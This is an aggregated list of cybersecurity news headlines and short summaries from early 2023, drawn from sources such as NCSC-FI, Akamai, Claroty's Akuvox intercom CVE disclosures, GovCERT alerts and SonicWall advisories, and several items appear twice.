https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-102023
The National Cyber Security Centre Finland’s weekly review – 10/2023
2023-03-14T14:38:48Z | 1678804728

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 3–9 March 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-102023
Attack Superhighway: A Deep Dive on Malicious DNS Traffic
2023-03-14T13:00:00Z | 1678798800

https://www.akamai.com/blog/security-research/a-deep-dive-on-malicious-dns-traffic
Corsa Security Scales Software Firewalls Across Full Range of Inspection Capacities
2023-03-14T12:15:00Z | 1678796100

Enterprises and service providers can efficiently scale network security to meet requirements of multiple scenarios Corsa Security announced today that it has expanded its Corsa Security Orchestrator (CSO) software so that network owners can deploy any range of inspection capacity from a few Gbps up to terabits of traffic using software firewalls.  Built on proprietary […] The post Corsa Security Scales Software Firewalls Across Full Range of Inspection Capacities appeared first on Corsa Security.

https://www.corsa.com/2023/03/14/corsa-security-scales-software-firewalls-across-full-range-of-inspection-capacities/
We need a new way to measure AI security
2023-03-14T12:00:47Z | 1678795247

Tl;dr: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems. If you’ve read any news over the past […]

https://blog.trailofbits.com/2023/03/14/ai-security-safety-audit-assurance-heidy-khlaaf-odd/
The Business Case for Security Transformation with Cato SSE 360
2023-03-14T11:52:37Z | 1678794757

The post The Business Case for Security Transformation with Cato SSE 360 appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-business-case-for-security-transformation-with-cato-sse-360/
Wide range of companies critical to the society apply for support for the development of information security in different sectors
2023-03-14T10:36:50Z | 1678790210

Approximately EUR 1.8 million of support for the development of information security has been granted to 77 companies. The support recipients cover a range of sectors and include companies of different sizes. So far, 656 applications have been received, and the applications of 86 companies have been processed. Support will be granted for as long as there is funding available. An appropriation of EUR 6 million has been reserved for the purpose.

https://www.kyberturvallisuuskeskus.fi/en/news/wide-range-companies-critical-society-apply-support-development-information-security-different
Wide range of companies critical to the society apply for support for the development of information security in different sectors
2023-03-14T10:36:50Z | 1678790210

Approximately EUR 1.8 million of support for the development of information security has been granted to 77 companies. The support recipients cover a range of sectors and include companies of different sizes. So far, 656 applications have been received, and the applications of 86 companies have been processed. Support will be granted for as long as there is funding available. An appropriation of EUR 6 million has been reserved for the purpose.

https://www.kyberturvallisuuskeskus.fi/en/news/wide-range-companies-critical-society-apply-support-development-information-security-different
RIA üleskutse emakeelepäeval. Aita tehisintellekt eesti keelt rääkima panna
2023-03-14T10:03:36Z | 1678788216

Kui me seni oleme harjunud kasutama kõnetehnoloogia lahendusi inglise keeles, ei ole kaugel ka aeg, kui me saame pöörduda oma telefoni, nutikella või auto poole oma emakeeles. Ent selleks tuleb talle enne eesti keel selgeks õpetada.

https://ria.ee/uudised/ria-uleskutse-emakeelepaeval-aita-tehisintellekt-eesti-keelt-raakima-panna
Top 5 Open Source Firewall for Network Security
2023-03-14T06:39:40Z | 1678775980

A firewall is a security system that is used to control network traffic and prevent

https://virtualattacks.com/top-5-open-source-firewall-for-network-security/
Security Alert (A23-03-07): Multiple Vulnerabilities in Microsoft Edge
2023-03-14T04:00:00Z | 1678766400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Olukord küberruumis – veebruar 2023
2023-03-13T15:06:56Z | 1678720016

Veebruaris registreerisime 206 mõjuga intsidenti, mis on viimase poole aasta keskmisest veidi madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-veebruar-2023
Tänasest, 13. märtsist saavad ettevõtted taotleda toetust küberturvalisuse parandamiseks
2023-03-13T13:29:09Z | 1678714149

EASi ja KredExi ühendasutus avas koostöös Riigi Infosüsteemi Ametiga 13. märtsil taotluste vastuvõtu ettevõtjate küberturvalisuse taseme tõstmiseks, mille kogueelarve on 865 000 eurot.

https://ria.ee/uudised/tanasest-13-martsist-saavad-ettevotted-taotleda-toetust-kuberturvalisuse-parandamiseks
Integrated vs. Converged SASE: Which One Ensures an Optimal Security Posture?
2023-03-13T09:20:33Z | 1678699233

SASE (Secure Access Service Edge) is a new architecture that converges networking and security into cloud-native, globally available service offerings. Security inspection and policy enforcement is performed at the cloud edge, instead of backhauling all traffic to a centralized data center for inspection. This enables organizations to strengthen their security posture while ensuring high performance,... The post Integrated vs. Converged SASE: Which One Ensures an Optimal Security Posture? appeared first on Cato Networks.

https://www.catonetworks.com/blog/integrated-vs-converged-sase-which-one-ensures-an-optimal-security-posture/
20 aastat usaldusväärseid e-teenuseid
2023-03-13T07:02:01Z | 1678690921

Riigiportaalil eesti.ee täitus pühapäeval, 12. märtsil 20 tegutsemisaastat.

https://ria.ee/uudised/20-aastat-usaldusvaarseid-e-teenuseid
Understanding Signaling System 7 (SS7)
2023-03-11T14:18:54Z | 1678544334

The Signaling System 7 (SS7) is a set of protocol suite telecommunication networks used to

https://virtualattacks.com/signaling-system-7-ss7/
DDoS Attacks in 2022: Targeting Everything Online, All at Once
2023-03-10T14:00:00Z | 1678456800

There was a big shift in DDoS targeting in 2022. Perhaps the most significant lesson learned: DDoS attackers are targeting everything, sometimes all at once.

https://www.akamai.com/blog/security/ddos-attacks-in-2022-targeting-everything-online
CVE-2023-0355
2023-03-09T17:30:00Z | 1678383000

CWE-321: Use of Hrad-Coded Cryptographic Key Akuvox E11 uses a hard-coded cryptographic key, which could allow an attacker to decrypt sensitive information. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0355
CVE-2023-0354
2023-03-09T17:30:00Z | 1678383000

CWE-306: Missing Authentication for Critical Function The Akuvox E11 web server can be accessed without any user authentication, and this could allow an attacker to access sensitive information, as well as create and download packet captures with known default URLs. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0354
CVE-2023-0353
2023-03-09T17:30:00Z | 1678383000

CWE-257: Storing Passwords in a Recoverable Format Akuvox E11 uses a weak encryption algorithm for stored passwords and uses a hard-coded password for decryption which could allow the encrypted passwords to be decrypted from the configuration file. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0353
CVE-2023-0352
2023-03-09T17:30:00Z | 1678383000

CWE-640: Weak Password Recovery Mechanism for Forgotten Password The Akuvox E11 password recovery webpage can be accessed without authentication, and an attacker could download the device key file. An attacker could then use this page to reset the password back to the default. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0352
CVE-2023-0351
2023-03-09T17:30:00Z | 1678383000

CWE-94: Command Injection The Akuvox E11 web server backend library allows command injection in the device phone-book contacts functionality. This could allow an attacker to upload files with executable command instructions. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0351
CVE-2023-0350
2023-03-09T17:30:00Z | 1678383000

CWE-646: Reliance on File Name or Extension of Externally Supplied File Akuvox E11 does not ensure that a file extension is associated with the file provided. This could allow an attacker to upload a file to the device by changing the extension of a malicious file to an accepted file type. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0350
CVE-2023-0349
2023-03-09T17:30:00Z | 1678383000

CWE-862: Missing Authorization The Akuvox E11 libvoice library provides unauthenticated access to the camera capture for image and video. This could allow an attacker to view and record image and video from the camera. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0349
CVE-2023-0348
2023-03-09T17:30:00Z | 1678383000

CWE-284: Improper Access Control Akuvox E11 allows direct SIP calls. No access control is enforced by the SIP servers, which could allow an attacker to contact any device within Akuvox to call any other device. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0348
CVE-2023-0347
2023-03-09T17:30:00Z | 1678383000

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor The Akuvox E11 Media Access Control (MAC) address, a primary identifier, combined with the Akuvox E11 IP address, could allow an attacker to identify the device on the Akuvox cloud. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0347
CVE-2023-0346
2023-03-09T17:30:00Z | 1678383000

CWE-287: Improper Authentication Akuvox E11 cloud login is performed through an unencrypted HTTP connection. An attacker could gain access to the Akuvox cloud and device if the MAC address of a device if known. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0346
CVE-2023-0345
2023-03-09T17:30:00Z | 1678383000

CWE-798: Use of Hard-Coded Credentials The Akuvox E11 secure shell (SSH) server is enabled by default and can be accessed by the root user. This password cannot be changed by the user. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0345
CVE-2023-0344
2023-03-09T17:30:00Z | 1678383000

CWE-912 Hidden Functionality Akuvox E11 appears to be using a custom version of dropbear SSH server. This server allows an insecure option that by default is not in the official dropbear SSH server. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0344
CVE-2023-0343
2023-03-09T17:30:00Z | 1678383000

CWE-329: Generation of Predictable IV with CBC: Akuvox E11 contains a function that encrypts messages which are then forwarded. The IV vector and the key are static, and this may allow an attacker to decrypt messages. Read more: "The Silent Spy Among Us: Modern Attacks Against Smart Intercoms" Read more: "Akuvox Smart Intercom Vulnerabilities Leave Privacy Ajar”

https://claroty.com/team82/disclosure-dashboard/cve-2023-0343
IronNet’s 2022 Annual Threat Report
2023-03-09T15:58:29Z | 1678377509

Threat Research from the IronNet Ecosystem Our Annual Threat Report shares unique observations and analysis from our Threat Research Team, combined with intelligence drawn from the vast telemetry of the IronNet ecosystem and the services we offer. This provides crucial insight into the ever-evolving cyber threat landscape so security teams can be more proactive in their defenses while we continue to move the community together to collectively defend against cyber threats.

https://www.ironnet.com/resource-library/2022-annual-threat-report
Normalizing Women in Tech with Intentionality
2023-03-09T14:00:00Z | 1678370400

Vice President Simone Stewart kicks off our Akamai ?Women In Tech? blog series and discusses how intentionality can cultivate a more inclusive environment.

https://www.akamai.com/blog/culture/normalizing-women-in-tech-with-intentionality
How To Be A Bold And Effective Security Leader During Times of Economic Downturn
2023-03-09T13:26:51Z | 1678368411

The post How To Be A Bold And Effective Security Leader During Times of Economic Downturn appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-how-to-be-a-bold-and-effective-security-leader-during-times-of-economic-downturn
Cato Analyzes the Dominant Sources of Threats in 2H2022 Research Report
2023-03-09T09:44:11Z | 1678355051

We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed through the Cato SASE Cloud network during the second half of 2022. The report highlights the most popular vulnerabilities that threat actors attempted to exploit, and the growing use of... The post Cato Analyzes the Dominant Sources of Threats in 2H2022 Research Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-analyzes-the-dominant-sources-of-threats-in-2h2022-research-report/
Security Alert (A23-03-06): Multiple Vulnerabilities in Cisco IOS XR Software
2023-03-09T04:00:00Z | 1678334400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
The High Accuracy Service (HAS) of the European satellite positioning system Galileo is now operational
2023-03-08T13:03:15Z | 1678280595

The Galileo High Accuracy Service (HAS) is open to all users and free of charge. The new service has potential uses in, for example, agriculture and forestry.

https://www.kyberturvallisuuskeskus.fi/en/news/high-accuracy-service-has-european-satellite-positioning-system-galileo-now-operational
The High Accuracy Service (HAS) of the European satellite positioning system Galileo is now operational
2023-03-08T13:03:15Z | 1678280595

The Galileo High Accuracy Service (HAS) is open to all users and free of charge. The new service has potential uses in, for example, agriculture and forestry.

https://www.kyberturvallisuuskeskus.fi/en/news/high-accuracy-service-has-european-satellite-positioning-system-galileo-now-operational
Akamai Mitigates Record DDoS Attack in Asia-Pacific (900 Gbps)
2023-03-08T08:00:00Z | 1678262400

https://www.akamai.com/blog/security/record-breaking-ddos-in-apac
High Threat Security Alert (A23-03-02): Multiple Vulnerabilities in Fortinet Products
2023-03-08T04:00:00Z | 1678248000

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-03): Multiple Vulnerabilities in Google Chrome
2023-03-08T04:00:00Z | 1678248000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-04): Multiple Vulnerabilities in Apache HTTP Server
2023-03-08T04:00:00Z | 1678248000

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-05): Multiple Vulnerabilities in Android
2023-03-08T04:00:00Z | 1678248000

Google has released Android Security Bulletin March 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Introducing Akamai Hunt to Stop the Most Evasive Threats and Risks
2023-03-07T14:00:00Z | 1678197600

https://www.akamai.com/blog/security/akamai-hunt-mitigates-most-evasive-threats
The National Cyber Security Centre Finland’s weekly review – 9/2023
2023-03-07T13:53:38Z | 1678197218

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 24 February–2 March 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-92023
The National Cyber Security Centre Finland’s weekly review – 9/2023
2023-03-07T13:53:38Z | 1678197218

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 24 February–2 March 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-92023
Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey
2023-03-07T12:00:44Z | 1678190444

Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey  By all accounts, 2023 is expected to see strong growth in the SASE market. Gartner has already predicted in The Top 5 Trends in Enterprise Networking and Why They Matter: A Gartner Trend Insight Report (subscription required) that by 2025, 50%... The post Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey appeared first on Cato Networks.

https://www.catonetworks.com/blog/unsolved-remote-access-challenges-continue-to-propel-sase-in-2023-finds-new-cato-survey/
Publicados resultados de Inquérito à Cibersegurança na Indústria 4.0
2023-03-07T00:00:00Z | 1678147200

O Observatório de Cibersegurança do CNCS publicou os resultados de um Inquérito à Indústria 4.0, realizado em colaboração com o Instituto Politécnico do Porto e o Compete 2020, dirigido aos técnicos operacionais e trabalhadores de organizações do âmbito da Indústria 4.0, sobre as políticas e as práticas de cibersegurança neste contexto.O objetivo deste inquérito foi compreender a integração de políticas e práticas de cibersegurança num domínio tecnológico particularmente avançado e emergente, como é o da Indústria 4.0.Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135761/publicados-resultados-de-inquerito-a-ciberseguranca-na-industria-40
Security Alert (A23-03-01): Multiple Vulnerabilities in SonicWall Products
2023-03-06T04:00:00Z | 1678075200

SonicWall has released security advisories to address multiple vulnerabilities in SonicOS which is the operating system for SonicWall firewalls.

https://www.govcert.gov.hk/en/alerts_detail.php
Kosmose küberharjutusväljaku ideekorje infoseminar!
2023-03-03T07:21:10Z | 1677828070

6. märtsil kell 14–16 toimub Microsoft Teams keskkonnas Eesti kosmose küberharjutusväljaku ideekorje infoseminar.

https://ria.ee/uudised/kosmose-kuberharjutusvaljaku-ideekorje-infoseminar
SonicOS SSLVPN Improper Restriction of Excessive MFA Attempts Vulnerability
2023-03-02T17:32:38Z | 1677778358

SonicOS SSLVPN improper restriction of excessive MFA attempts vulnerability allows an authenticated attacker to use excessive MFA codes. CVE: CVE-2023-1101 Last updated: March 28, 2023, 11:32 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0005
SonicOS Unauthenticated Stack-Based Buffer Overflow Vulnerability
2023-03-02T17:19:25Z | 1677777565

A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall.And SonicWall strongly urges organizations using impacted SonicWall firewalls listed below to follow the provided guidance.NOTE: This vulnerability ONLY impacts the "web management" interface, the SonicOS SSLVPN interface is not impacted. CVE: CVE-2023-0656 Last updated: March 28, 2023, 11:19 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004
Card Shop Threat Landscape: BidenCash Dumps 2.1M Stolen Credit Cards
2023-03-02T16:59:15Z | 1677776355

What we know about the most recent BidenCash dump, and what it means in the context of the greater card shop threat landscape. The post Card Shop Threat Landscape: BidenCash Dumps 2.1M Stolen Credit Cards appeared first on Flashpoint.

https://flashpoint.io/blog/card-shop-threat-landscape-bidencash-dumps-stolen-credit-cards/
Changing Healthcare Delivery Requires Evolving Security Strategies
2023-03-02T14:00:00Z | 1677765600

https://www.akamai.com/blog/news/changing-healthcare-delivery-requires-evolving-security-strategies
SASE in Manufacturing: Overcoming Security and Connectivity Challenges
2023-03-02T11:36:25Z | 1677756985

Industry 4.0 is revolutionizing the manufacturing industry as we are witnessing numerous innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) helping manufacturers enhance their supply chain, logistics and production lines. While we see these operations evolving into smart factories, the industry still faces challenges that could adversely impact its ability to realize... The post SASE in Manufacturing: Overcoming Security and Connectivity Challenges appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-in-manufacturing-overcoming-security-and-connectivity-challenges/
High Threat Security Alert (A23-02-23): Multiple Vulnerabilities in Cisco Products
2023-03-02T04:00:00Z | 1677729600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Cloud Computing Services Pricing Update
2023-03-01T14:00:00Z | 1677679200

https://www.akamai.com/blog/cloud/akamai-cloud-computing-price-update
The National Cyber Security Centre Finland’s weekly review – 8/2023
2023-03-01T13:49:08Z | 1677678548

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 17–23 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-82023
The National Cyber Security Centre Finland’s weekly review – 8/2023
2023-03-01T13:49:08Z | 1677678548

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 17–23 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-82023
DNS Abuse Techniques Matrix
2023-03-01T00:00:00Z | 1677628800

The DNS Abuse SIG is very pleased to announce the publication of the DNS Abuse Techniques Matrix, the work of many months and a great number of people from various parts of the security and DNS worlds.

https://www.first.org/blog/20230228-DNS_Abuse_Techniques_Matrix
DNS Abuse Techniques Matrix
2023-03-01T00:00:00Z | 1677628800

The DNS Abuse SIG is very pleased to announce the publication of the DNS Abuse Techniques Matrix, the work of many months and a great number of people from various parts of the security and DNS worlds.

https://www.first.org/blog/20230228-DNS_Abuse_Techniques_Matrix
Security Advisory - Out-of-Bounds Write Vulnerability in a Huawei Sound Box Product
2023-03-01T00:00:00Z | 1677628800

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-oobwviatp-89e403d4-en
SS8 Networks to Deliver High Accuracy Emergency Caller Location in Latin America
2023-02-27T22:20:49Z | 1677536449

The enhanced solution provides cost-effective regulatory compliance MILPITAS, Calif. and LONDON, UK – February 28, 2023 –  SS8 Networks, a trusted provider of lawful and location intelligence solutions worldwide, today announced that a leading telecommunications provider in Latin America has chosen SS8’s LocationWise to deliver highly accurate emergency caller location. As a cloud-ready solution, SS8’s […] The post SS8 Networks to Deliver High Accuracy Emergency Caller Location in Latin America appeared first on SS8.

https://www.ss8.com/ss8-networks-to-deliver-high-accuracy-emergency-caller-location-in-latin-america/
Healthcare Organizations Must Balance Cybersecurity with Other Priorities
2023-02-27T14:00:00Z | 1677506400

Porter Research finds that today?s healthcare organizations must balance investments in data protection with resources they need to provide high-quality care.

https://www.akamai.com/blog/security/healthcare-organizations-must-balance-cybersecurity-with-other-priorities
Reusable properties for Ethereum contracts
2023-02-27T13:00:54Z | 1677502854

As smart contract security constantly evolves, property-based fuzzing has become a go-to technique for developers and security engineers. This technique relies on the creation of code properties – often called invariants – which describe what the code is supposed to do. To help the community define properties, we are releasing a set of 168 pre-built […]

https://blog.trailofbits.com/2023/02/27/reusable-properties-ethereum-contracts-echidna/
New instructions shed light on cyber threats concerning local mobile networks and the management of risks
2023-02-27T11:10:21Z | 1677496221

What kinds of cyber threats and risks are associated with local mobile networks? What should be taken into account when building networks? Our new instructions provide information to organisations that are considering local mobile networks (instructions only available in Finnish).

https://www.kyberturvallisuuskeskus.fi/en/news/new-instructions-shed-light-cyber-threats-concerning-local-mobile-networks-and-management
New instructions shed light on cyber threats concerning local mobile networks and the management of risks
2023-02-27T11:10:21Z | 1677496221

What kinds of cyber threats and risks are associated with local mobile networks? What should be taken into account when building networks? Our new instructions provide information to organisations that are considering local mobile networks (instructions only available in Finnish).

https://www.kyberturvallisuuskeskus.fi/en/news/new-instructions-shed-light-cyber-threats-concerning-local-mobile-networks-and-management
Interruptions in online services are common and usually harmless
2023-02-27T11:08:22Z | 1677496102

Denial-of-service (DoS) attacks against organisations’ websites and online services are common. In practice, they take place all the time, everywhere. Measures are also taken to prepare for the attacks, and attacks are successfully prevented each day. You may notice DoS attacks if the website of a bank or a healthcare organisation is unavailable, for example. Websites may also be temporarily down because of other disturbances or maintenance work.

https://www.kyberturvallisuuskeskus.fi/en/news/interruptions-online-services-are-common-and-usually-harmless
Interruptions in online services are common and usually harmless
2023-02-27T11:08:22Z | 1677496102

Denial-of-service (DoS) attacks against organisations’ websites and online services are common. In practice, they take place all the time, everywhere. Measures are also taken to prepare for the attacks, and attacks are successfully prevented each day. You may notice DoS attacks if the website of a bank or a healthcare organisation is unavailable, for example. Websites may also be temporarily down because of other disturbances or maintenance work.

https://www.kyberturvallisuuskeskus.fi/en/news/interruptions-online-services-are-common-and-usually-harmless
Algab Riigikogu valimiste valimisnädal
2023-02-27T10:16:09Z | 1677492969

Täna kell 9 algas elektrooniline hääletamine, kell 12 avatakse omavalitsuste ja Tallinna linnaosade keskuste jaoskonnad. Kõik 405 valimisjaoskonda ootavad valijaid alates reedest.

https://ria.ee/uudised/algab-riigikogu-valimiste-valimisnadal
Zero trust migration: How will I know if I can remove my VPN?
2023-02-27T09:12:45Z | 1677489165

In our third blog about migrating to a zero trust architecture, we consider the security properties of an Always On VPN, and the factors to consider when deciding if you no longer need one.

https://www.ncsc.gov.uk/blog-post/zero-trust-migration-how-will-i-know-if-i-can-remove-my-vpn
Security Alert (A23-02-22): Multiple Vulnerabilities in Microsoft Edge
2023-02-27T04:00:00Z | 1677470400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Deliver Faster Downloads for Better Browsing, Part 4 of 5
2023-02-24T14:00:00Z | 1677247200

Web browsers read HTML, CSS, and JavaScript code as well as video, images, and SVG files, then use that data to build and render a web page.

https://www.akamai.com/blog/developers/deliver-faster-downloads-for-better-browsing-part-4-of-5
FIRST - Global Incident Response & Security Team organization to hold 35th Conference in Canada in June
2023-02-24T00:00:00Z | 1677196800

The Forum of Incident Response and Security Teams (FIRST) plans to hold its 35th Annual Conference with the theme ‘Empowering Communities,’ in Montreal, Quebec, Canada, from June 4 to 9, 2023. This six-day event brings the incident prevention community together with cyber security experts to foster information sharing, cooperation, and coordination. Typically, over 1,000 people from around the world attend.

https://www.first.org/newsroom/releases/20230224
FIRST - Global Incident Response & Security Team organization to hold 35th Conference in Canada in June
2023-02-24T00:00:00Z | 1677196800

The Forum of Incident Response and Security Teams (FIRST) plans to hold its 35th Annual Conference with the theme ‘Empowering Communities,’ in Montreal, Quebec, Canada, from June 4 to 9, 2023. This six-day event brings the incident prevention community together with cyber security experts to foster information sharing, cooperation, and coordination. Typically, over 1,000 people from around the world attend.

https://www.first.org/newsroom/releases/20230224
The Evolution of DDoS in Financial Services ? Much More than a Nuisance
2023-02-23T14:00:00Z | 1677160800

Cyberattacks cost an average of 50% more for financial institutions than for firms in all other industries combined ? and they continue to evolve.

https://www.akamai.com/blog/security/evolution-ddos-financial-services
Escaping well-configured VSCode extensions (for profit)
2023-02-23T13:00:42Z | 1677157242

In part one of this two-part series, we escaped Webviews in real-world misconfigured VSCode extensions. But can we still escape extensions if they are well-configured? In this post, we’ll demonstrate how I bypassed a Webview’s localResourceRoots by exploiting small URL parsing differences between the browser—i.e., the Electron-created Chromium instance where VSCode and […]

https://blog.trailofbits.com/2023/02/23/escaping-well-configured-vscode-extensions-for-profit/
A tale of Phobos - how we almost cracked a ransomware using CUDA
2023-02-23T11:00:00Z | 1677150000

For the past two years we've been tinkering with a proof-of-concept decryptor for the Phobos family ransomware. It works, but is impractical to use for reasons we'll explain here. Consequently, we've been unable to use it to help a real-world victim so far. We've decided to publish our findings and tools, in hope that someone will find it useful, interesting or will continue our research. We will describe the vulnerability, and how we improved our decryptor computational complexity and performance to reach an almost practical implementation.

https://cert.pl/en/posts/2023/02/breaking-phobos/
Security Alert (A23-02-19): Multiple Vulnerabilities in Cisco Products
2023-02-23T04:00:00Z | 1677124800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-20): Multiple Vulnerabilities in Google Chrome
2023-02-23T04:00:00Z | 1677124800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-21): Vulnerability in Apache Tomcat
2023-02-23T04:00:00Z | 1677124800

The Apache Software Foundation released a security update to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
EIP Stack Group OpENer GetAttributeList attribute_count_request out-of-bounds write vulnerability
2023-02-23T00:00:00Z | 1677110400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1661
EIP Stack Group OpENer Forward Open connection_management_entry use of uninitialized pointer vulnerability
2023-02-23T00:00:00Z | 1677110400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1663
EIP Stack Group OpENer SetAttributeList attribute_count_request out-of-bounds write vulnerability
2023-02-23T00:00:00Z | 1677110400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1662
Long Time No See!
2023-02-23T00:00:00Z | 1677110400

"Long time no see!” was the most popular phrase at the TF-CSIRT – FIRST Regional Symposium in Bilbao, Spain. And it has been a long time indeed – last time we met all together was in Malaga in 2020. We had some virtual events in the meantime, but it was certainly nice to see old faces and meet new colleagues in real life. The first joint post-pandemic event took place from 30th of January to 2nd of February, kindly hosted by the Basque Cybersecurity Centre.

https://www.first.org/blog/20230223_long_time_no_see
Long Time No See!
2023-02-23T00:00:00Z | 1677110400

"Long time no see!” was the most popular phrase at the TF-CSIRT – FIRST Regional Symposium in Bilbao, Spain. And it has been a long time indeed – last time we met all together was in Malaga in 2020. We had some virtual events in the meantime, but it was certainly nice to see old faces and meet new colleagues in real life. The first joint post-pandemic event took place from 30th of January to 2nd of February, kindly hosted by the Basque Cybersecurity Centre.

https://www.first.org/blog/20230223_long_time_no_see
Fantastic RPC Interfaces and How to Find Them
2023-02-22T15:00:00Z | 1677078000

Looking for your next security research project? Our RPC Interface Analyzer tool can help you find it.

https://www.akamai.com/blog/security-research/rpc-toolkit-fantastic-interfaces-how-to-find
Cyber security of social welfare and healthcare services is improved in many networks
2023-02-22T11:48:31Z | 1677066511

Continuity of operations of social welfare and healthcare services is ever more dependent on cyber security. Cooperation takes place on many fronts in Finland and elsewhere in order to improve sector's cyber security. Traficom's National Cyber Security Centre participates in many of the networks. The NCSC facilitates some of the networks, and participates as a member in others. Large part of cooperation is done in voluntary groups.

